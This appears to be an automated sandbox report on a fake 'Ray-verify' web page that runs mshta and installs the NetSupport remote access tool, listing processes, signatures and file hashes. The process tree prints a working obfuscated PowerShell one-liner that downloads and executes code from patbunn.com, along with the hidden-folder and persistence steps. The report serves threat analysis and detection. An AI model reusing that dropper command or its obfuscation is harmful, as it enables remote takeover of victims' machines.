Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://noisefreqs.c...

windows11-21h2-x64

10

Resubmissions

03-12-2024 22:36

241203-2jjc4axqbs 10

03-12-2024 22:31

241203-2fsscsxngw 3

Analysis

  • max time kernel
    70s
  • max time network
    71s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    03-12-2024 22:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://noisefreqs.com/Ray-verify.html

Score
10/10
netsupportdefense_evasiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://noisefreqs.com/Ray-verify.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://patbunn.com/o/o.png

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Netsupport family
    netsupport
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 37 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://noisefreqs.com/Ray-verify.html
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe1d1f3cb8,0x7ffe1d1f3cc8,0x7ffe1d1f3cd8
      2⤵
        PID:876
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1784 /prefetch:2
        2⤵
          PID:1660
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:420
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
          2⤵
            PID:3964
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
            2⤵
              PID:2888
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
              2⤵
                PID:4440
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3736
              • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4008
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                2⤵
                  PID:4344
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
                  2⤵
                    PID:2656
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                    2⤵
                      PID:4848
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,6290589186935618857,4970218175573094016,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
                      2⤵
                        PID:4156
                    • C:\Windows\System32\CompPkgSrv.exe
                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                      1⤵
                        PID:4928
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:2100
                        • C:\Windows\system32\control.exe
                          "C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools
                          1⤵
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2928
                        • C:\Windows\SysWOW64\DllHost.exe
                          C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                          1⤵
                          • System Location Discovery: System Language Discovery
                          PID:844
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                          1⤵
                          • Modifies Internet Explorer settings
                          • Modifies registry class
                          • Suspicious behavior: AddClipboardFormatListener
                          • Suspicious use of FindShellTrayWindow
                          PID:4308
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe"
                            2⤵
                              PID:4088
                              • C:\Windows\system32\mshta.exe
                                mshta.exe https://noisefreqs.com/Ray-verify.html
                                3⤵
                                • Blocklisted process makes network request
                                PID:2400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://patbunn.com/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                  4⤵
                                  • Blocklisted process makes network request
                                  • Adds Run key to start application
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4892
                                  • C:\Windows\system32\ipconfig.exe
                                    "C:\Windows\system32\ipconfig.exe" /flushdns
                                    5⤵
                                    • Gathers network information
                                    PID:3656
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\QuSCgr
                                    5⤵
                                    • Hide Artifacts: Hidden Files and Directories
                                    PID:844
                                    • C:\Windows\system32\attrib.exe
                                      attrib +h C:\Users\Admin\AppData\Roaming\QuSCgr
                                      6⤵
                                      • Views/modifies file attributes
                                      PID:692
                                  • C:\Users\Admin\AppData\Roaming\QuSCgr\client32.exe
                                    "C:\Users\Admin\AppData\Roaming\QuSCgr\client32.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:2148
                          • C:\Windows\system32\BackgroundTransferHost.exe
                            "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                            1⤵
                            • Modifies registry class
                            PID:1376
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:5000

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              fdee96b970080ef7f5bfa5964075575e

                              SHA1

                              2c821998dc2674d291bfa83a4df46814f0c29ab4

                              SHA256

                              a241023f360b300e56b2b0e1205b651e1244b222e1f55245ca2d06d3162a62f0

                              SHA512

                              20875c3002323f5a9b1b71917d6bd4e4c718c9ca325c90335bd475ddcb25eac94cb3f29795fa6476d6d6e757622b8b0577f008eec2c739c2eec71d2e8b372cff

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                              Filesize

                              152B

                              MD5

                              46e6ad711a84b5dc7b30b75297d64875

                              SHA1

                              8ca343bfab1e2c04e67b9b16b8e06ba463b4f485

                              SHA256

                              77b51492a40a511e57e7a7ecf76715a2fd46533c0f0d0d5a758f0224e201c77f

                              SHA512

                              8472710b638b0aeee4678f41ed2dff72b39b929b2802716c0c9f96db24c63096b94c9969575e4698f16e412f82668b5c9b5cb747e8a2219429dbb476a31d297e

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              9a24f4869fe687cc373827faad013446

                              SHA1

                              708baa546cae6e0ac8620fd37d1e9bcb711768ad

                              SHA256

                              5f9c5abc9e58c750fc31abd5dccc5527297e3efaaa581dea44f550875c822c2b

                              SHA512

                              daf7feb50097469836f8139eab73ec0bde9867ac8aa2614baef22ae6c273f6f3b06791b28ca9e22531dd392151e7476a802e700399ac4eb278e24d55dad30ab0

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              5KB

                              MD5

                              6b6aedb0a11256a4a60bdbccd77be0ff

                              SHA1

                              4f9227b630dd4c015d704fe540508bf0c9b618f7

                              SHA256

                              d262802b6679cb3e96ec3afe90359ee0d0aac76d064cfa0775a8d0dcac08378a

                              SHA512

                              7539ff25156e8f0b9207055e77e909eeceddf6d732a2b55c607d9d77df5390f8e88a3ea0c71d64d30db3a66c6b1393ddc311575e5e7b3eaf1e854fc81a366373

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                              Filesize

                              6KB

                              MD5

                              25f4991158302362620d14813814fc1f

                              SHA1

                              dd628fc469aacceacb402ea0580236520e6747e7

                              SHA256

                              e475334d981dd4340d687428a650bcc60d3358a743fc5d9732b2f8e01674a430

                              SHA512

                              4bcf6f92746de19e60b0607119dac21f4b1052edca8449897ed58f4859f493131125094fb52ba6a0e70e10f84e0109d80d08ef25354ebab8954ef4cc055da773

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                              Filesize

                              16B

                              MD5

                              46295cac801e5d4857d09837238a6394

                              SHA1

                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                              SHA256

                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                              SHA512

                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                              Filesize

                              16B

                              MD5

                              206702161f94c5cd39fadd03f4014d98

                              SHA1

                              bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                              SHA256

                              1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                              SHA512

                              0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              10KB

                              MD5

                              ffb5e7059581468d74f6c17a395da6db

                              SHA1

                              8c5a35f4d415e6affbb28fb90006bc247550c549

                              SHA256

                              b90381900ebd8591149c1a340f962947930a444b198c8d7e17c2b8e7fce293a7

                              SHA512

                              88af28313d93334d5e0d112e37fe7c6ee40d7716cce196d6926dbb15b99aa31038503f217dc405e4eac2c20341209675189adb590407f8d816ae3b9b67f0fb9a

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              11KB

                              MD5

                              63d888c863abf572bb836153a48a93f5

                              SHA1

                              31631f0fc826d34649594bbfeca015f39e98eef1

                              SHA256

                              c447a11bf9dfc78cee60089c4e2d7d3a3cdf2eb7fd3f501388749f644ad1425e

                              SHA512

                              d83a769a956587b033db8f04ebdbbf9ccd42683d8c7dd928da672aa83d82bd8eb42c88edbd808db581057fef63844b09a6e513bc1c0366ad35c53be9676d20cb

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                              Filesize

                              10KB

                              MD5

                              b88b92d6b713ddda3348c0d7cd874095

                              SHA1

                              b3c298987063c36e362b3b68f735f608a0189226

                              SHA256

                              54ace8ca40079ccfa74ddb0dd11b92a8ded1050d91188b6c9d75a043603f4932

                              SHA512

                              18825e031ab5502c322209e9b29ea057679665a319121e5360affd902addd26915996a4257269cf3bb2c5f8b17045ae2993c35fa0cccf3a4c29d50e97e4f7eb3

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\7c772ae6-a8e7-4cbb-a26c-113b5bb8f1c5.down_data
                              Filesize

                              555KB

                              MD5

                              5683c0028832cae4ef93ca39c8ac5029

                              SHA1

                              248755e4e1db552e0b6f8651b04ca6d1b31a86fb

                              SHA256

                              855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

                              SHA512

                              aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fze4wzct.2mi.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\HTCTL32.DLL
                              Filesize

                              320KB

                              MD5

                              2d3b207c8a48148296156e5725426c7f

                              SHA1

                              ad464eb7cf5c19c8a443ab5b590440b32dbc618f

                              SHA256

                              edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

                              SHA512

                              55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\NSM.LIC
                              Filesize

                              257B

                              MD5

                              390c964070626a64888d385c514f568e

                              SHA1

                              a556209655dcb5e939fd404f57d199f2bb6da9b3

                              SHA256

                              ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54

                              SHA512

                              f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\PCICHEK.DLL
                              Filesize

                              18KB

                              MD5

                              a0b9388c5f18e27266a31f8c5765b263

                              SHA1

                              906f7e94f841d464d4da144f7c858fa2160e36db

                              SHA256

                              313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

                              SHA512

                              6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\PCICL32.DLL
                              Filesize

                              3.6MB

                              MD5

                              00587238d16012152c2e951a087f2cc9

                              SHA1

                              c4e27a43075ce993ff6bb033360af386b2fc58ff

                              SHA256

                              63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

                              SHA512

                              637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\client32.exe
                              Filesize

                              117KB

                              MD5

                              ee75b57b9300aab96530503bfae8a2f2

                              SHA1

                              98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

                              SHA256

                              06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

                              SHA512

                              660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\client32.ini
                              Filesize

                              647B

                              MD5

                              8c978a6d8f380d59c9db4afe06218b89

                              SHA1

                              1fa286e91c8aa0eeb99276af72d40e02d2148c51

                              SHA256

                              d8c2b28ff9f90626f7e669b4fbdb45ed553a3cb1a980e23fdfea4fbbdddfc502

                              SHA512

                              b74539ae7fc88756c1e1404814d33197cd8709aaddf2c43167f2cf157e947c2cabad759414038dbe5e83b201786052e94ab53bd97bb4de68744f514f8ae7f552

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\msvcr100.dll
                              Filesize

                              755KB

                              MD5

                              0e37fbfa79d349d672456923ec5fbbe3

                              SHA1

                              4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

                              SHA256

                              8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

                              SHA512

                              2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\QuSCgr\pcicapi.dll
                              Filesize

                              32KB

                              MD5

                              dcde2248d19c778a41aa165866dd52d0

                              SHA1

                              7ec84be84fe23f0b0093b647538737e1f19ebb03

                              SHA256

                              9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

                              SHA512

                              c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

                              Download Submit

                            • \??\pipe\LOCAL\crashpad_4852_MWMTGSPTWLBYCLDK
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                              Download Submit

                            • memory/4892-99-0x000001A8D4F30000-0x000001A8D4F52000-memory.dmp

                              Filesize

                              136KB

                              Download